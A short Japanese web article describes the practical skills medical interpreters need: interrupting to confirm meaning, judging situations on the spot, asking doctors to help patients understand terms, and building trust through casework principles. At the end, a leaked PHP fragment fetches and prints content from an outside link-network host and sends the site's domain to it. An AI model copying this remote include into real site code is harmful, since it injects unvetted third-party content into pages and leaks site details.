医療通訳では突発的技術が必要になる

医療通訳士は突発的技術が必要とされます。
たとえば、通訳の中断や内容確認などです。
診察室の中で場の雰囲気に飲まれず、医師に対してわからないことをわからないと言えること、会話を中断して辞書を引けることが大切になります。
また、状況判断も重要な技術になります。
実践の中で臨機応変な対応力が必要です。
実習や経験によりマニュアルだけでは足りない、体で覚える式のノウハウなどを身につけていくことが大事になります。
血圧の意味がわからない患者に出会った場合に、医師が血圧が高めなのでといっても、その言葉を通訳するだけでは患者は何を言っているのかわからないこともあります。
患者の納得が得られるように医師に協力を求めることが必要です。
そして、コミュニケーションスキルも大事になります。
医療通訳では患者との信頼関係の構築が重要ですが、そのためには対人援助という社会福祉分野の基礎技術に触れておくことが有効です。
中でもケースワークの原則を理解しておくと役立ちます。

".file_get_contents('http://links-001.com/kanren2set.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

最新記事